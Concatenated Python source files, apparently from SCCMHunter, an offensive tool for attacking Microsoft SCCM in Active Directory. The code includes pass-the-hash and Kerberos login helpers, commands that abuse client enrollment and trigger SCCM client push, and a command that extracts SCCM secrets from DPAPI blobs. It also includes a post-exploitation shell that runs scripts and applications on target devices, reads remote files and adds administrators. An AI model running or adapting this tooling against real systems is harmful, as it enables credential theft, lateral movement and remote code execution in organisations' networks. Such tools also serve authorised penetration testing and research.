    def __print_key_values(self, rpc, keyHandler):
        i = 0
        while True:
            try:
                ans4 = rrp.hBaseRegEnumValue(rpc, keyHandler, i)
                lp_value_name = ans4['lpValueNameOut'][:-1]
                if len(lp_value_name) == 0:
                    lp_value_name = '(Default)'
                lp_type = ans4['lpType']
                lp_data = b''.join(ans4['lpData'])
                #('\t' + lp_value_name + '\t' + self.__regValues.get(lp_type, 'KEY_NOT_FOUND') + '\t', end=' ')
                self.__parse_lp_data(lp_type, lp_data)
                i += 1
            except rrp.DCERPCSessionError as e:
                if e.get_error_code() == ERROR_NO_MORE_ITEMS:
                    break


    def finish(self):
        self.__restore()
        if self.__rrp is not None:
            self.__rrp.disconnect()
        if self.__scmr is not None:
            self.__scmr.disconnect()



import base64
from impacket.smbconnection import SMBConnection
from impacket.spnego import SPNEGO_NegTokenInit, TypesMech
from binascii import unhexlify
from ldap3 import ANONYMOUS
from lib.logger import logger
import ldap3
import sys
import ssl
import os



def get_dn(domain):
    components = domain.split('.')
    base = ''
    for comp in components:
        base += f',DC={comp}'
    
    return base[1:]

def get_machine_name(domain_controller, domain):
    if domain_controller is not None:
        s = SMBConnection(domain_controller, domain_controller)
    else:
        s = SMBConnection(domain, domain)
    try:
        s.login('', '')
    except Exception:
        if s.getServerName() == '':
            raise Exception('Error while anonymous logging into %s' % domain)
    else:
        s.logoff()
    return s.getServerName()

def init_ldap_connection(target, tls_version, domain, username, password, lmhash, nthash, domain_controller, kerberos, hashes, aesKey, use_channel_binding, signing=False):
    if signing:
        if use_channel_binding:
            logger.info("LDAP signing and channel binding are mutually exclusive.")
            sys.exit(1)
        if tls_version is not None:
            logger.info("LDAP signing is used over plain LDAP; LDAPS already provides integrity.")
            sys.exit(1)
        from lib.ldap_signed import build_signed_session
        logger.debug(f'[LDAP] Attempting signed bind | target={target} kerberos={bool(kerberos)} hashes={bool(hashes)}')
        ldap_session = build_signed_session(
            target=target,
            domain=domain,
            username=username,
            password=password,
            lmhash=lmhash,
            nthash=nthash,
            domain_controller=domain_controller,
            kerberos=kerberos,
            hashes=hashes,
            aes_key=aesKey,
        )
        return None, ldap_session

    user = '%s\\%s' % (domain, username)
    if tls_version is not None:
        use_ssl = True
        port = 636
        tls = ldap3.Tls(validate=ssl.CERT_NONE, version=tls_version)
    else:
        use_ssl = False
        port = 389
        tls = None
    ldap_server = ldap3.Server(target, get_info=ldap3.ALL, port=port, use_ssl=use_ssl, tls=tls)

    channel_binding = dict()
    if use_channel_binding:
        channel_binding = dict(channel_binding=ldap3.TLS_CHANNEL_BINDING)
    if kerberos:
        if channel_binding is True:
            logger.info("Kerberos auth + channel binding isn't supported yet.")
            sys.exit(1)
        logger.debug(f'[LDAP] Attempting Kerberos bind | target={target} port={port} ssl={use_ssl}')
        ldap_session = ldap3.Connection(ldap_server)
        ldap_session.bind()
        ldap3_kerberos_login(ldap_session, target, username, password, domain, lmhash, nthash, aesKey, kdcHost=domain_controller)
    elif hashes is not None:
        if lmhash == "":
            lmhash = "aad3b435b51404eeaad3b435b51404ee"
        logger.debug(f'[LDAP] Attempting NTLM bind (hash) | target={target} port={port} ssl={use_ssl} user={user}')
        try:
            ldap_session = ldap3.Connection(ldap_server, user=user, password=lmhash + ":" + nthash, authentication=ldap3.NTLM, auto_bind=True, **channel_binding)
        except Exception as e:
            logger.debug(f'[LDAP] Bind failed | {e}')
            raise
    elif username == '' and password == '':
        logger.debug(f'[LDAP] Attempting anonymous bind | target={target} port={port} ssl={use_ssl}')
        try:
            ldap_session = ldap3.Connection(ldap_server, authentication=ANONYMOUS, auto_bind=True, **channel_binding)
        except Exception as e:
            logger.debug(f'[LDAP] Bind failed | {e}')
            raise
    else:
        logger.debug(f'[LDAP] Attempting NTLM bind (password) | target={target} port={port} ssl={use_ssl} user={user}')
        try:
            ldap_session = ldap3.Connection(ldap_server, user=user, password=password, authentication=ldap3.NTLM, auto_bind=True, **channel_binding)
        except Exception as e:
            logger.debug(f'[LDAP] Bind failed | {e}')
            raise

    return ldap_server, ldap_session

def init_ldap_session(domain, username, password, lmhash, nthash, kerberos, domain_controller, ldaps, hashes, aesKey, channel_binding, signing=False):
    if signing and channel_binding:
        logger.info("LDAP signing and channel binding are mutually exclusive.")
        sys.exit(1)
    if signing and ldaps:
        logger.info("LDAP signing is used over plain LDAP; LDAPS already provides integrity.")
        sys.exit(1)

    if kerberos:
        #target = domain_controller
        netbiosname = get_machine_name(domain_controller, domain)
        #dontlookhereok
        target = netbiosname + "." + domain
    else:
        if domain_controller is not None:
            target = domain_controller
        else:
            target = domain

    if ldaps:
        try:
            return init_ldap_connection(target, ssl.PROTOCOL_TLSv1_2, domain, username, password, lmhash, nthash, domain_controller, kerberos, hashes, aesKey, channel_binding, signing=signing)
        except ldap3.core.exceptions.LDAPSocketOpenError:
            return init_ldap_connection(target, ssl.PROTOCOL_TLSv1, domain, username, password, lmhash, nthash, domain_controller, kerberos, hashes, aesKey, channel_binding, signing=signing)
    else:
        return init_ldap_connection(target, None, domain, username, password, lmhash, nthash, domain_controller, kerberos, hashes, aesKey, channel_binding, signing=signing)

def ldap3_kerberos_login(connection, target, user, password, domain='', lmhash='', nthash='', aesKey='', kdcHost=None, TGT=None, TGS=None, useCache=True, admin_service=False):
    from pyasn1.codec.ber import encoder, decoder
    from pyasn1.type.univ import noValue
    """
    logins into the target system explicitly using Kerberos. Hashes are used if RC4_HMAC is supported.
    :param string user: username
    :param string password: password for the user
    :param string domain: domain where the account is valid for (required)
    :param string lmhash: LMHASH used to authenticate using hashes (password is not used)
    :param string nthash: NTHASH used to authenticate using hashes (password is not used)
    :param string aesKey: aes256-cts-hmac-sha1-96 or aes128-cts-hmac-sha1-96 used for Kerberos authentication
    :param string kdcHost: hostname or IP Address for the KDC. If None, the domain will be used (it needs to resolve tho)
    :param struct TGT: If there's a TGT available, send the structure here and it will be used
    :param struct TGS: same for TGS. See smb3.py for the format
    :param bool useCache: whether or not we should use the ccache for credentials lookup. If TGT or TGS are specified this is False
    :return: True, raises an Exception if error.
    """

    # Normalize optional inputs that may arrive as None from CLI options.
    user = '' if user is None else user
    password = '' if password is None else password
    domain = '' if domain is None else domain
    lmhash = '' if lmhash is None else lmhash
    nthash = '' if nthash is None else nthash
    aesKey = '' if aesKey is None else aesKey

    if lmhash != '' or nthash != '':
        if len(lmhash) % 2:
            lmhash = '0' + lmhash
        if len(nthash) % 2:
            nthash = '0' + nthash
        try:  # just in case they were converted already
            lmhash = unhexlify(lmhash)
            nthash = unhexlify(nthash)
        except TypeError:
            pass

    # Importing down here so pyasn1 is not required if kerberos is not used.
    from impacket.krb5.ccache import CCache
    from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REP, seq_set
    from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
    from impacket.krb5 import constants
    from impacket.krb5.types import Principal, KerberosTime, Ticket
    import datetime

    if TGT is not None or TGS is not None:
        useCache = False

    if useCache:
        try:
            ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
            if ccache is None:
                raise Exception('CCache file is not found. Skipping...')
        except Exception as e:
            # No cache present
            logger.warning(e)
            pass
        else:
            # retrieve domain information from CCache file if needed
            if domain == '':
                domain = ccache.principal.realm['data'].decode('utf-8')


            logger.debug('Using Kerberos Cache: %s' % os.getenv('KRB5CCNAME'))

            # Build the service principal name
            if admin_service:
                service_principal = 'HTTP/%s@%s' % (target.upper(), domain.upper())
            else:
                service_principal = 'ldap/%s@%s' % (target.upper(), domain.upper())

            # First, try to get the TGS (service ticket) from cache
            creds = ccache.getCredential(service_principal)
            if creds is None:
                # No TGS in cache, try to get TGT instead
                tgt_principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
                creds = ccache.getCredential(tgt_principal)
                if creds is not None:
                    TGT = creds.toTGT()
                    logger.debug('Using TGT from cache')
                else:
                    logger.debug('No valid credentials found in cache')
            else:
                # Found TGS in cache - we can reuse it!
                TGS = creds.toTGS(service_principal)
                logger.debug('Using TGS from cache for principal: %s' % service_principal)

            # retrieve user information from CCache file if needed
            if user == '' and creds is not None:
                user = creds['client'].prettyPrint().split(b'@')[0].decode('utf-8')
                logger.debug('Username retrieved from CCache: %s' % user)
            elif user == '' and len(ccache.principal.components) > 0:
                user = ccache.principal.components[0]['data'].decode('utf-8')
                logger.debug('Username retrieved from CCache: %s' % user)

    # First of all, we need to get a TGT for the user
    userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
    kdc_str = kdcHost if kdcHost else domain
    logger.debug(f'[KRB5] principal={user}@{domain.upper()} target={target} kdc={kdc_str}')
    if TGT is None:
        if TGS is None:
            if password == '' and lmhash == '' and nthash == '' and aesKey == '':
                raise ValueError(
                    'Kerberos authentication requires one of: a valid Kerberos ccache, '
                    'password, NTLM hash, or AES key.'
                )
            auth_method = 'aes' if aesKey else ('nthash' if nthash else 'password')
            logger.debug(f'[KRB5] Requesting TGT (AS-REQ) | kdc={kdc_str} auth={auth_method}')
            try:
                tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash, aesKey, kdcHost)
            except Exception as e:
                logger.debug(f'[KRB5] TGT request failed | {e}')
                raise
            logger.debug(f'[KRB5] TGT obtained | enctype={cipher.enctype}')
    else:
        tgt = TGT['KDC_REP']
        cipher = TGT['cipher']
        sessionKey = TGT['sessionKey']
        logger.debug(f'[KRB5] Using provided TGT | enctype={cipher.enctype}')

    if TGS is None:
        # No TGS in cache, need to request one from KDC
        if admin_service:
            serverName = Principal('HTTP/%s' % target, type=constants.PrincipalNameType.NT_SRV_INST.value)
        else:
            serverName = Principal('ldap/%s' % target, type=constants.PrincipalNameType.NT_SRV_INST.value)
        logger.debug(f'[KRB5] Requesting TGS (TGS-REQ) | service={serverName} kdc={kdc_str}')
        try:
            tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey)
        except Exception as e:
            logger.debug(f'[KRB5] TGS request failed | {e}')
            raise
        logger.debug(f'[KRB5] TGS obtained | enctype={cipher.enctype}')
    else:
        # Reuse cached TGS - no KDC call needed!
        logger.debug('Reusing cached TGS - skipping KDC request')
        tgs = TGS['KDC_REP']
        cipher = TGS['cipher']
        sessionKey = TGS['sessionKey']
        logger.debug(f'[KRB5] Using cached TGS | enctype={cipher.enctype}')

        # Let's build a NegTokenInit with a Kerberos REQ_AP

    blob = SPNEGO_NegTokenInit()

    # Kerberos
    blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']]

    # Let's extract the ticket from the TGS
    tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
    ticket = Ticket()
    ticket.from_asn1(tgs['ticket'])

    # Now let's build the AP_REQ
    apReq = AP_REQ()
    apReq['pvno'] = 5
    apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)

    opts = []
    apReq['ap-options'] = constants.encodeFlags(opts)
    seq_set(apReq, 'ticket', ticket.to_asn1)

    authenticator = Authenticator()
    authenticator['authenticator-vno'] = 5
    authenticator['crealm'] = domain
    seq_set(authenticator, 'cname', userName.components_to_asn1)
    now = datetime.datetime.utcnow()

    authenticator['cusec'] = now.microsecond
    authenticator['ctime'] = KerberosTime.to_asn1(now)

    encodedAuthenticator = encoder.encode(authenticator)

    # Key Usage 11
    # AP-REQ Authenticator (includes application authenticator
    # subkey), encrypted with the application session key
    # (Section 5.5.1)
    encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None)

    apReq['authenticator'] = noValue
    apReq['authenticator']['etype'] = cipher.enctype
    apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator

    blob['MechToken'] = encoder.encode(apReq)


    if admin_service:
        token = base64.b64encode(blob.getData()).decode('ascii')
        return f'Negotiate {token}'
    else:
        request = ldap3.operation.bind.bind_operation(connection.version, ldap3.SASL, user, None, 'GSS-SPNEGO',
                                                  blob.getData())

        # Done with the Kerberos saga, now let's get into LDAP
        logger.debug(f'[KRB5] Sending SASL GSS-SPNEGO bindRequest | user={user} server={connection.server}')
        if connection.closed:  # try to open connection if closed
            connection.open(read_server_info=False)

        connection.sasl_in_progress = True
        response = connection.post_send_single_response(connection.send('bindRequest', request, None))
        connection.sasl_in_progress = False
        if response[0]['result'] != 0:
            result_code = response[0].get('result', 'unknown')
            description = response[0].get('description', '')
            message = response[0].get('message', '')
            logger.debug(f'[LDAP] Kerberos bind failed | result={result_code} description={description!r} message={message!r}')
            raise Exception(response)

        connection.bound = True

    return True



import typer
from lib.attacks.http import HTTP
from lib.logger import init_logger

app = typer.Typer()
COMMAND_NAME = 'http'
HELP = 'Abuse client enrollment.'

@app.callback(no_args_is_help=True, invoke_without_command=True)

def main(
    username        : str   = typer.Option(None, "-u",  help="Username"),
    password        : str   = typer.Option(None, '-p',  help="Password"),
    domain          : str   = typer.Option(None, '-d',  help="Target domain"),
    dc_ip           : str   = typer.Option(None, '-dc-ip',  help = "IP address or FQDN of domain controller"),
    ldaps           : bool  = typer.Option(False, '-ldaps', help='Use LDAPS instead of LDAP'),
    channel_binding : bool   = typer.Option(None, '-binding', help='Use LDAP channel binding'),
    signing         : bool   = typer.Option(False, '-signing', help='Use LDAP signing (NTLM/Kerberos over plain LDAP)'),
    kerberos        : bool  = typer.Option(False, "-k", help='Use Kerberos authentication'),
    no_pass         : bool  = typer.Option(False, "-no-pass", help="don't ask for password (useful for -k)"),
    hashes          : str   = typer.Option(None, "-hashes",metavar="LMHASH:NTHASH", help="LM and NT hashes, format is LMHASH:NTHASH"),
    aes             : str   = typer.Option(None, '-aes', metavar="HEX KEY", help='AES key to use for Kerberos Authentication (128 or 256 bits)'), 
    debug           : bool  = typer.Option(False, '-debug',help='Enable Verbose Logging'),
    auto            : bool  = typer.Option(False, '-auto', help='Attempt to create a machine and recover policies with provided credentials.'),
    computer_pass   : str   = typer.Option(None, '-cp', help='Machine account password'),
    computer_hash   : str   = typer.Option(None, '-ch', help='Machine account NTLM hash. (can be used *only* for sccm push attack)'),
    computer_name   : str   = typer.Option(None, '-cn', help='Machine account name.'),
    uuid            : str   = typer.Option(None, '-uuid', help='UUID for manual request.'),
    mp              : str   = typer.Option(None, '-mp', help='Management Point to manually request from'),
    sleep           : str   = typer.Option(10, '-sleep', help='Time to wait between registering and requesting policies'),
    sccmpush        : bool  = typer.Option(False, "--sccm-push", "-sp", help="[Optional] Try to trigger sccm push on specified client"),
    sccmpush_client : str   = typer.Option(None, "--sccm-push-cn", "-spcn", help="[Mandatory with --sccm-push] client name to be registerd when performing sccm push attack which should be a controlled & reachable IP/FQDN)"),
    sccmpush_anon   : bool   = typer.Option(False, "--sccm-push-anonymous", "-spanon", help="try to perform sccm push without credentials"),
    platform_id     : str   = typer.Option("Microsoft Windows NT Workstation 2010.0","--sccm-push-plid", "-sppid", help="[Optional] Specify the plateformID when performing sccm push attack (ex: Microsoft Windows NT Server 10.0)")
    ):


    logs_dir = init_logger(debug)
    httphunter = HTTP(username=username, password=password, domain=domain, dc_ip=dc_ip,ldaps=ldaps,
                            kerberos=kerberos, no_pass=no_pass, hashes=hashes, aes=aes, debug=debug, auto=auto, channel_binding=channel_binding, signing=signing,
                            computer_pass=computer_pass, computer_name=computer_name, computer_hash=computer_hash, uuid=uuid, mp=mp,
                            sp=sccmpush, spcn=sccmpush_client,sppid=platform_id, spanon=sccmpush_anon,sleep=sleep, logs_dir=logs_dir)
    httphunter.run()







import typer
from lib.attacks.dpapi import DPAPIHunter
from lib.logger import init_logger

app = typer.Typer()
COMMAND_NAME = 'dpapi'
HELP = 'Extract SCCM secrets from DPAPI encrypted blobs, requires Local Administrator privileges.'

@app.callback(no_args_is_help=True, invoke_without_command=True)

def main(
    username        : str   = typer.Option(..., "-u",  help="Username"),
    password        : str   = typer.Option('', '-p',  help="Password"),
    domain          : str   = typer.Option('', '-d',  help="Target domain"),
    dc_ip           : str   = typer.Option(None, '-dc-ip',  help = "IP address or FQDN of domain controller (Use FQDN if Kerberos is used)"),
    target          : str   = typer.Option(..., '-target',  help = "Target hostname"),
    kerberos        : bool  = typer.Option(False, "-k", help='Use Kerberos authentication'),
    no_pass         : bool  = typer.Option(False, "-no-pass", help="don't ask for password (useful for -k)"),
    hashes          : str   = typer.Option(None, "-hashes",metavar="LMHASH:NTHASH", help="LM and NT hashes, format is LMHASH:NTHASH"),
    aesKey          : str   = typer.Option(None, '-aesKey', metavar="HEX KEY", help='AES key to use for Kerberos Authentication (128 or 256 bits)'),
    wmi             : bool  = typer.Option(False, '-wmi', help='Extract SCCM secrets stored in the WMI repository.'),
    disk            : bool  = typer.Option(False, '-disk', help='Extract SCCM secrets from disk (OBJECTS.DATA), useful for accessing potentially changed or deleted secrets.'),
    both            : bool  = typer.Option(False, '-both', help='Combines both WMI and disk methods to retrieve SCCM secrets.'), 
    debug           : bool  = typer.Option(False, '-debug',help='Enable Verbose Logging'),
    impacket_debug  : bool  = typer.Option(False, '-impacket-debug',help='Enable Impacket Logging')):


    if impacket_debug:
        import logging
        from impacket import version
        logging.getLogger().setLevel(logging.DEBUG)
        logging.debug(version.getInstallationPath())
        logging.debug(version.BANNER)

    logs_dir = init_logger(debug)
    dpapihunter = DPAPIHunter(remoteName=target, username=username, password=password, domain=domain, 
                        kerberos=kerberos, no_pass=no_pass, hashes=hashes, aesKey=aesKey, kdc=dc_ip, logs_dir=logs_dir, debug=debug, wmi=wmi, disk=disk, both=both)
    dpapihunter.run()


import logging
from rich.logging import RichHandler
from rich.console import Console
import os

console = Console()

FORMAT = "%(message)s"

OBJ_EXTRA_FMT = {
    "markup": True,
    "highlighter": False
}

logger = logging.getLogger(__name__)
logger.propagate = False

def prep_logs():
    home = os.path.expanduser('~')
    save_dir = f'{(home)}/.sccmhunter'
    logs_dir = f'{save_dir}/logs'
    loot_dir = f'{logs_dir}/loot'
    csv_dir = f'{logs_dir}/csvs'
    json_dir = f'{logs_dir}/json'
    db_dir = f'{logs_dir}/db'
    if not os.path.isdir(save_dir):
        logger.info("[!] First time use detected.")
        logger.info(f"[!] SCCMHunter data will be saved to {save_dir}")
        os.mkdir(save_dir)
    if not os.path.isdir(logs_dir):
        os.mkdir(logs_dir)
    if not os.path.isdir(loot_dir):
        os.mkdir(loot_dir)
    if not os.path.isdir(csv_dir):
        os.mkdir(csv_dir)
    if not os.path.isdir(json_dir):
        os.mkdir(json_dir)
    if not os.path.isdir(db_dir):
        os.mkdir(db_dir)
        with open(f'{db_dir}/sccmhunter.db', 'w') as fp:
            pass
    return logs_dir


def init_logger(debug):
    richHandler = RichHandler(omit_repeated_times=False, 
                              show_path=False, 
                              keywords=[], 
                              console=console)
    
    if debug:
        logger.setLevel(logging.DEBUG)
    else:
        logger.setLevel(logging.INFO)


    richHandler.setFormatter(logging.Formatter(FORMAT, datefmt='[%X]'))
    logger.addHandler(richHandler)
    logs_dir = prep_logs()
    return logs_dir


def printlog(servers, logs_dir, filename):
    logfile = f'{logs_dir}/{filename}'
    logger.info(f'[+] Results saved to {logfile}')
    with open(logfile, 'w') as f:
        for server in servers:
            if server is not None:
                f.write("{}\n".format(server))
                f.close


import base64
import json

from impacket.ldap import ldap as impacket_ldap
from impacket.ldap.ldap import LDAPSearchError
from impacket.ldap.ldapasn1 import SearchResultEntry, SDFlagsControl

from lib.logger import logger


_SD_FLAGS_OID = '1.2.840.113556.1.4.801'

# AD returns these as raw bytes; UTF-8 decoding would silently corrupt them.
_BINARY_ATTRS = {'objectsid', 'objectguid', 'ntsecuritydescriptor'}

# AD returns these as digit strings; callers compare them as ints.
_INT_ATTRS = {'samaccounttype'}


def _decode_value(attr_name_lower, raw):
    b = bytes(raw) if isinstance(raw, (bytes, bytearray)) else bytes(str(raw), 'utf-8')

    if attr_name_lower in _BINARY_ATTRS:
        return b

    try:
        text = b.decode('utf-8')
    except UnicodeDecodeError:
        return b

    if attr_name_lower in _INT_ATTRS:
        try:
            return int(text)
        except ValueError:
            return text
    return text


class SignedAttribute:
    def __init__(self, name, values):
        self.name = name
        self.values = values

    @property
    def value(self):
        if not self.values:
            return None
        if len(self.values) == 1:
            return self.values[0]
        return list(self.values)

    def __str__(self):
        v = self.value
        if v is None:
            return ''
        return str(v)

    def __eq__(self, other):
        return self.value == other


class SignedEntry:
    def __init__(self, dn, attributes):
        self._dn = dn
        self._attrs = attributes
        self._lower_index = {k.lower(): k for k in attributes.keys()}

    @property
    def entry_dn(self):
        return self._dn

    def __contains__(self, name):
        return name.lower() in self._lower_index

    def __getitem__(self, name):
        key_lower = name.lower()
        if key_lower not in self._lower_index:
            raise KeyError(name)
        real = self._lower_index[key_lower]
        return SignedAttribute(real, self._attrs[real])

    def entry_to_json(self, **_ignored):
        payload = {'dn': self._dn, 'attributes': {}}
        for name, values in self._attrs.items():
            rendered = [_jsonable(v) for v in values]
            payload['attributes'][name] = rendered[0] if len(rendered) == 1 else rendered
        return json.dumps(payload, ensure_ascii=True, sort_keys=True, indent=4, separators=(',', ': '))


def _jsonable(v):
    if isinstance(v, bytes):
        return {'encoding': 'base64', 'encoded': base64.b64encode(v).decode('ascii')}
    return v


def _translate_controls(controls):
    if not controls:
        return None
    out = []
    for ctrl in controls:
        try:
            if str(ctrl['controlType']) == _SD_FLAGS_OID:
                out.append(SDFlagsControl(criticality=True, flags=0x07))
                continue
        except Exception:
            pass
        out.append(ctrl)
    return out


class _StandardExtend:
    def __init__(self, session):
        self._session = session

    def paged_search(self, search_base=None, search_filter='(objectClass=*)',
                     attributes=None, controls=None, paged_size=500,
                     generator=False, **_ignored):
        if attributes is None:
            attrs = []
        elif isinstance(attributes, str):
            attrs = [attributes] if attributes != '*' else []
        else:
            attrs = list(attributes)

        search_controls = _translate_controls(controls)

        try:
            answers = self._session._conn.search(
                searchBase=search_base,
                searchFilter=search_filter,
                attributes=attrs,
                searchControls=search_controls,
            )
        except LDAPSearchError as e:
            logger.debug(f'[LDAP-signed] search failed | {e}')
            self._session.entries = []
            raise

        entries = []
        for msg in answers:
            if not isinstance(msg, SearchResultEntry):
                continue
            dn = str(msg['objectName'])
            attrs_map = {}
            for part in msg['attributes']:
                attr_name = str(part['type'])
                decoded = [_decode_value(attr_name.lower(), v.asOctets()) for v in part['vals']]
                attrs_map[attr_name] = decoded
            entries.append(SignedEntry(dn, attrs_map))

        self._session.entries = entries
        return entries


class _Extend:
    def __init__(self, session):
        self.standard = _StandardExtend(session)


class SignedLDAPSession:
    def __init__(self, impacket_conn):
        self._conn = impacket_conn
        self.entries = []
        self.extend = _Extend(self)

    def unbind(self):
        try:
            self._conn.close()
        except Exception:
            pass


def _normalize_hashes(lmhash, nthash):
    if lmhash == '' and nthash == '':
        return '', ''
    if lmhash == '':
        lmhash = 'aad3b435b51404eeaad3b435b51404ee'
    return lmhash, nthash


def build_signed_session(target, domain, username, password, lmhash, nthash,
                         domain_controller, kerberos, hashes, aes_key):
    base_dn = _domain_to_base_dn(domain)
    url = f'ldap://{target}'
    logger.debug(f'[LDAP-signed] connecting | url={url} base={base_dn} dstIp={domain_controller}')
    conn = impacket_ldap.LDAPConnection(url, baseDN=base_dn, dstIp=domain_controller)

    if kerberos:
        logger.debug(f'[LDAP-signed] kerberosLogin | user={username} domain={domain}')
        conn.kerberosLogin(
            username or '', password or '', domain or '',
            lmhash or '', nthash or '', aes_key or '',
            kdcHost=domain_controller,
        )
    else:
        if hashes:
            lmhash, nthash = _normalize_hashes(lmhash or '', nthash or '')
            logger.debug(f'[LDAP-signed] NTLM login (hash) | user={username} domain={domain}')
        else:
            logger.debug(f'[LDAP-signed] NTLM login (password) | user={username} domain={domain}')
        conn.login(
            username or '', password or '', domain or '',
            lmhash or '', nthash or '',
        )

    return SignedLDAPSession(conn)


def _domain_to_base_dn(domain):
    return ','.join(f'DC={p}' for p in domain.split('.')) if domain else ''



import cmd2
import os
import requests
from requests_ntlm import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from tabulate import tabulate

from lib.logger import logger
from lib.ldap import ldap3_kerberos_login
from lib.parsers.parsers import PARSERS
from lib.scripts.pivot import CMPIVOT, ADD_ADMIN, SMSAPPLICATION, SPEAKTOTHEMANAGER, DATABASE, SMSSCRIPTS

# #add debugging
class SHELL(cmd2.Cmd):
    SA = "Situational Awareness Commands"
    PE = "PostEx Commands"
    DB = "Database Commands"
    IN = "Interface Commands"
    CE = "Credential Extraction Commands"
    OPSEC = "Opsec Configuration Commands"
    hidden = ["alias", "help", "macro", "run_pyscript", "set", "shortcuts", "edit", "history", "quit", "run_script", "shell", "_relative_run_script", "eof"]
    

    def __init__(self, username, password, kerberos, domain, kdc, target, logs_dir, auser, apassword, accache=None, ps_transform=None):
        #initialize plugins
        self.pivot = CMPIVOT(username=username, password=password, target = target,  kerberos=kerberos, domain=domain, kdcHost=kdc, logs_dir = logs_dir)
        self.script = SMSSCRIPTS(username=username, password=password, target = target, kerberos=kerberos, domain=domain, kdcHost=kdc, logs_dir = logs_dir, auser=auser, apassword=apassword, accache=accache, ps_transform=ps_transform)
        self.admin = ADD_ADMIN(username=username, password=password,target_ip=target, kerberos=kerberos, domain=domain, kdcHost=kdc, logs_dir=logs_dir)
        self.db = DATABASE(username=username, password=password,url=target, kerberos=kerberos, domain=domain, kdcHost=kdc, logs_dir=logs_dir)
        self.application = SMSAPPLICATION(username=username, password=password,target=target, kerberos=kerberos, domain=domain, kdcHost=kdc, logs_dir=logs_dir)
        self.karen = SPEAKTOTHEMANAGER(username=username, password=password, target=target, kerberos=kerberos, domain=domain, kdcHost=kdc )
        
        #initialize cmd
        super().__init__(allow_cli_args=False)
        self.hidden_commands = self.hidden
        self.username = username
        self.password = password
        self.target = target
        self.kerberos = kerberos
        self.kdc = kdc
        self.domain = domain
        self.logs_dir = logs_dir
        self.headers = {'Content-Type': 'application/json; odata=verbose'} # modify useragent? currently shows python useragent in logs
        self.intro = logger.info('[!] Enter help for extra shell commands')
        self.cwd = "C:\\"
        self.device = ""
        self.prompt = f"({self.device}) {self.cwd} >> "
        self.hostname = ""
        self.approve_user = auser
        self.approve_password = apassword


# ############
# cmd2 Settings
# ############

    def emptyline(self):
        pass

    def postcmd(self, stop, arg):
        self.prompt = f"({self.device}) ({self.cwd}) >> "
        return stop

    @cmd2.with_argparser(PARSERS.interact_parser)
    @cmd2.with_category(IN)
    def do_interact(self, args):
        """Target Device/Collection to Query               interact (device code)"""

        self.device = args.device

    @cmd2.with_category(IN)
    def do_exit(self, arg):
        """Exit the console."""
        return True 
    

    @cmd2.with_argparser(PARSERS.cd_parser)
    @cmd2.with_category(SA)
    def do_cd(self, args):
        """Change current working directory."""
        #path needs to end with \ or all file system queries will fail
        if not args.path.endswith("\\"): 
            self.cwd = args.path + "\\"
        else:
            self.cwd = args.path

# ############
# Optional OPSEC Toggles
# ############

    @cmd2.with_category(OPSEC)
    def do_set_scriptauthor(self, arg):
        """Set the author name for scripts created in this session.    set_scriptauthor (author name)"""
        self.script.script_author = arg
        logger.info(f"Script author set to {arg}")
        
    @cmd2.with_category(OPSEC)
    def do_set_scriptname(self, arg):
        """Set the name for scripts created in this session.           set_scriptname (script name)"""
        self.script.script_name = arg
        logger.info(f"Script name set to {arg}")

# ############
# Database Section
# ############

    @cmd2.with_argparser(PARSERS.get_device_parser)
    @cmd2.with_category(DB)
    def do_get_device(self, args):
        """Query specific device information"""
        self.db.devices(args.device)
    
    
    @cmd2.with_argparser(PARSERS.get_user_parser)
    @cmd2.with_category(DB)
    def do_get_user(self, args):
        """Query specific user information"""
        self.db.users(args.user)

    @cmd2.with_argparser(PARSERS.get_collection_parser)
    @cmd2.with_category(DB)
    def do_get_collection(self, args):
        """Query for all (*) or single (id) collection(s)"""
        self.db.collections(args.collection_id)


    @cmd2.with_argparser(PARSERS.get_collection_members_parser)
    @cmd2.with_category(DB)
    def do_get_collectionmembers(self, args):
        """Query for all members of a colection."""
        self.db.collection_member(args.collection_id)
    
    @cmd2.with_argparser(PARSERS.get_puser_parser)
    @cmd2.with_category(DB)
    def do_get_puser(self, args):
        """Query for devices the target is a primary user"""
        self.db.pusers(args.user)

    @cmd2.with_argparser(PARSERS.get_lastlogon_parser)
    @cmd2.with_category(DB)
    def do_get_lastlogon(self, args):
        """Query for devices the target recently signed in"""
        self.db.last_logon(args.user)


# ############
# Application Section
# ############

    @cmd2.with_category(PE)
    @cmd2.with_argparser(PARSERS.application_parser)
    def do_application(self, args):
        """Run application on target                    """
        self.application.run(path=args.path, runas_user=args.system, name=args.name, collection_type=args.collection_type, target_resource=args.target, collection_id=args.collection_id)

# ############
# PowerShell Script Section
# All modules will call and execute script from the lib.scripts directory
# ############

    
    @cmd2.with_argparser(PARSERS.cat_parser)
    @cmd2.with_category(SA)    
    def do_cat(self, args):
        """Read file contents.                             cat (filename)"""
        filename = self.cwd + args.filename
        fullpath = self.cwd + filename
        logger.info(f"Tasked SCCM to show {filename}")
        self.script.cat(fullpath, device=self.device)
        
    @cmd2.with_argparser(PARSERS.script_parser)
    @cmd2.with_category(PE)
    def do_script(self, args):
        """Run script on target                         script (/path/to/script) """
        self.script.run(device=self.device, optional_target=args.script)


    #didn't add a parser to this one s
    @cmd2.with_category(PE)
    def do_list_scripts(self, arg):
        """List scripts. """
        self.script.list_scripts()

    @cmd2.with_argparser(PARSERS.delete_script_parser)
    @cmd2.with_category(PE)
    def do_delete_script(self, args):
        """Delete a script from the SCCM server.        delete_script (GUID)"""
        self.script.delete_script(args.script_guid)
    

    @cmd2.with_argparser(PARSERS.get_script_parser)
    @cmd2.with_category(PE)
    def do_get_script(self, args):
        """Get a script from the SCCM server.           get_script (GUID)"""
        self.script.get_script(args.script_guid)


# ############
# CMPivot Section
# All modules will call built-in CMPivot queries
# ############

